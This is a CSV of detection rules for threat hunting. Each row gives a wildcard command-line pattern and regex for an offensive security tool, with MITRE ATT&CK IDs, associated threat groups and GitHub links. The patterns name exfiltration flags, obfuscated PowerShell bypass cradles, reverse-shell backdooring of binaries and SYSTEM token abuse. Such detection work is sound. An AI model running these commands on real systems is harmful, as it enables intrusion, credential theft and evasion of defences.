"* exec * -p * -c *",".{0,1000}\sexec\s.{0,1000}\s\-p\s.{0,1000}\s\-c\s.{0,1000}","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","N/A","1","95","12","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z","1099"
"* exec * --pid * --command *",".{0,1000}\sexec\s.{0,1000}\s\-\-pid\s.{0,1000}\s\-\-command\s.{0,1000}","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","N/A","1","95","12","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z","1100"
"* exec -dll *.dll -config *.config*",".{0,1000}\sexec\s\-dll\s.{0,1000}\.dll\s\-config\s.{0,1000}\.config.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","1102"
"* exec-command -clear*",".{0,1000}\sexec\-command\s\-clear.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","1103"
"* exec-command -command *",".{0,1000}\sexec\-command\s\-command\s.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","1104"
"* exec-command -shell*",".{0,1000}\sexec\-command\s\-shell.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","1105"
"* --exec-method atexec*",".{0,1000}\s\-\-exec\-method\satexec.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","1106"
"* --exec-method mmcexec*",".{0,1000}\s\-\-exec\-method\smmcexec.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","1107"
"* --exec-method smbexec*",".{0,1000}\s\-\-exec\-method\ssmbexec.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","1108"
"* -exec-shellcode *",".{0,1000}\s\-exec\-shellcode\s.{0,1000}","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","Sandworm","C2","https://github.com/byt3bl33d3r/gcat","1","0","N/A","N/A","10","10","1332","425","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z","1109"
"* -eXecut byPaSS -Noprof -w H -Co *",".{0,1000}\s\-eXecut\sbyPaSS\s\-Noprof\s\-w\sH\s\-Co\s.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","1110"
"* -eXecUT byPAss -WINDo 1 -nOpR -coMm """"& ((vARiaBlE '*mdr*').Name[3,11,2]-JoiN'')*",".{0,1000}\s\-eXecUT\sbyPAss\s\-WINDo\s1\s\-nOpR\s\-coMm\s\""\&\s\(\(vARiaBlE\s\'.{0,1000}mdr.{0,1000}\'\)\.Name\[3,11,2\]\-JoiN\'\'\).{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","1111"
"* -eXecUT byPAss -WINDo 1 -nOpR -coMm *",".{0,1000}\s\-eXecUT\sbyPAss\s\-WINDo\s1\s\-nOpR\s\-coMm\s.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","1112"
"* execute *NT AUTHORITY\SYSTEM*cmd /c *",".{0,1000}\sexecute\s.{0,1000}NT\sAUTHORITY\\SYSTEM.{0,1000}cmd\s\/c\s.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","1113"
"* Execute command elevated through Run Dialog*",".{0,1000}\s\sExecute\scommand\selevated\sthrough\sRun\sDialog.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","#content","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","1114"
"* Execute command elevated through task manager*",".{0,1000}\s\sExecute\scommand\selevated\sthrough\stask\smanager.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","#content","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","1115"
"* execute NT AUTHORITY\SYSTEM* cmd true bypass*",".{0,1000}\sexecute\sNT\sAUTHORITY\\SYSTEM.{0,1000}\scmd\strue\sbypass.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","1116"
"* execute_shellcode.exe*",".{0,1000}\sexecute_shellcode\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","1117"
"* --execution false --save True --output *.bin*",".{0,1000}\s\-\-execution\sfalse\s\-\-save\sTrue\s\-\-output\s.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/senzee1984/micr0_shell","1","0","N/A","N/A","9","2","186","30","2024-07-21T08:16:57Z","2023-08-13T02:46:51Z","1118"
"* exegol.apk*",".{0,1000}\sexegol\.apk.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","1119"
"* exegol.py*",".{0,1000}\sexegol\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","1120"
"* exe-selfdelete*",".{0,1000}\sexe\-selfdelete.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","1121"
"* --exfil --cookie-dump  * --all*",".{0,1000}\s\-\-exfil\s\-\-cookie\-dump\s\s.{0,1000}\s\-\-all.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","1122"
"* --exfil --cookie-dump *",".{0,1000}\s\-\-exfil\s\-\-cookie\-dump\s.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","1123"
"* --exfil --teams --owa --owa-limit*",".{0,1000}\s\-\-exfil\s\-\-teams\s\-\-owa\s\-\-owa\-limit.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","1124"
"* --exfil --teams --owa*",".{0,1000}\s\-\-exfil\s\-\-teams\s\-\-owa.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","1125"
"* --exfil --tokens * --onedrive --owa*",".{0,1000}\s\-\-exfil\s\-\-tokens\s.{0,1000}\s\-\-onedrive\s\-\-owa.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","1126"
"* --exfil --tokens * --onedrive*",".{0,1000}\s\-\-exfil\s\-\-tokens\s.{0,1000}\s\-\-onedrive.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","1127"
"* Exfil.sh*",".{0,1000}\sExfil\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","1128"
"* exfilGui.ps1*",".{0,1000}\sexfilGui\.ps1.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","1129"
"* exfiltrate.exe*",".{0,1000}\sexfiltrate\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","0","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","1130"
"* exocet.go *.exe*",".{0,1000}\sexocet\.go\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","0","N/A","N/A","10","9","840","147","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z","1132"
"* exploit_suggester.py*",".{0,1000}\sexploit_suggester\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","1133"
"* --exploit=DCOM*",".{0,1000}\s\-\-exploit\=DCOM.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","1134"
"* --exploit=DCOM*",".{0,1000}\s\-\-exploit\=DCOM.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","1135"
"* --exploit=EfsRpc*",".{0,1000}\s\-\-exploit\=EfsRpc.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","1136"
"* --exploit=PrintSpoofer*",".{0,1000}\s\-\-exploit\=PrintSpoofer.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","1137"
"* --exploit=WinRM*",".{0,1000}\s\-\-exploit\=WinRM.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","1138"
"* Exrop(*/bin/*",".{0,1000}\sExrop\(.{0,1000}\/bin\/.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tool","https://github.com/d4em0n/exrop","1","0","#linux","N/A","N/A","3","285","22","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z","1139"
"* ExtensionSpoof.exe*",".{0,1000}\sExtensionSpoof\.exe.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","0","N/A","N/A","9","2","179","65","2024-12-12T18:05:28Z","2017-11-11T16:02:17Z","1140"
"* extract --secrets --zsh*",".{0,1000}\sextract\s\-\-secrets\s\-\-zsh.{0,1000}","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","0","N/A","N/A","7","2","129","8","2024-06-19T10:39:39Z","2023-07-22T12:31:57Z","1141"
"* extract_wifi.exe*",".{0,1000}\sextract_wifi\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","1142"
"* -f *.bin -e AMSI*",".{0,1000}\s\-f\s.{0,1000}\.bin\s\-e\sAMSI.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","10","10","1185","143","2024-06-01T16:46:57Z","2020-10-08T11:22:26Z","1146"
"* -f *.bin -e Defender*",".{0,1000}\s\-f\s.{0,1000}\.bin\s\-e\sDefender.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","10","10","1185","143","2024-06-01T16:46:57Z","2020-10-08T11:22:26Z","1147"
"* -f *.exe --encrypt xor --jmp -o *.exe*",".{0,1000}\s\-f\s.{0,1000}\.exe\s\-\-encrypt\sxor\s\-\-jmp\s\-o\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","0","N/A","N/A","10","8","773","122","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z","1163"
"* -f *.exe -m onionduke -b *.dll*",".{0,1000}\s\-f\s.{0,1000}\.exe\s\-m\sonionduke\s\-b\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE  ELF  Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","1164"
"* -f *.exe -m onionduke -b *.exe*",".{0,1000}\s\-f\s.{0,1000}\.exe\s\-m\sonionduke\s\-b\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE  ELF  Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","1165"
"* -f *.ps1 -l 3 -o *.ps1 -v -t powershell*reverse*",".{0,1000}\s\-f\s.{0,1000}\.ps1\s\-l\s3\s\-o\s.{0,1000}\.ps1\s\-v\s\-t\spowershell.{0,1000}reverse.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","1166"
"* -f Find-AllVulns*",".{0,1000}\s\-f\sFind\-AllVulns.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","N/A","7","2","195","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z","1167"
"* -f Find-PathDLLHijack*",".{0,1000}\s\-f\sFind\-PathDLLHijack.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","N/A","7","2","195","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z","1168"
"* -f Get-DomainGroupMember* -a *-Identity *admin* -Recurse*",".{0,1000}\s\-f\sGet\-DomainGroupMember.{0,1000}\s\-a\s.{0,1000}\-Identity\s.{0,1000}admin.{0,1000}\s\-Recurse.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","N/A","7","2","195","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z","1169"
"* -f Invoke-Inveigh*",".{0,1000}\s\-f\sInvoke\-Inveigh.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","N/A","7","2","195","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z","1170"
"* -f kirbi *",".{0,1000}\s\-f\skirbi\s.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","N/A","10","1281","181","2025-01-27T09:22:54Z","2019-01-08T18:42:07Z","1171"
"* -f nessus.nessus *",".{0,1000}\s\-f\snessus\.nessus\s.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","1172"
"* -f passw -e xlsx csv *",".{0,1000}\s\-f\spassw\s\-e\sxlsx\scsv\s.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","1173"
"* -f passw user admin account network login logon cred *",".{0,1000}\s\-f\spassw\suser\sadmin\saccount\snetwork\slogin\slogon\scred\s.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","1174"
"* -f psexec.exe -H * -P * -s reverse_shell_tcp*",".{0,1000}\s\-f\spsexec\.exe\s\-H\s.{0,1000}\s\-P\s.{0,1000}\s\-s\sreverse_shell_tcp.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE  ELF  Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","1175"
"* -f raw -e none -o Nova_MSG.bin*",".{0,1000}\s\-f\sraw\s\-e\snone\s\-o\sNova_MSG\.bin.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","N/A","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","1176"
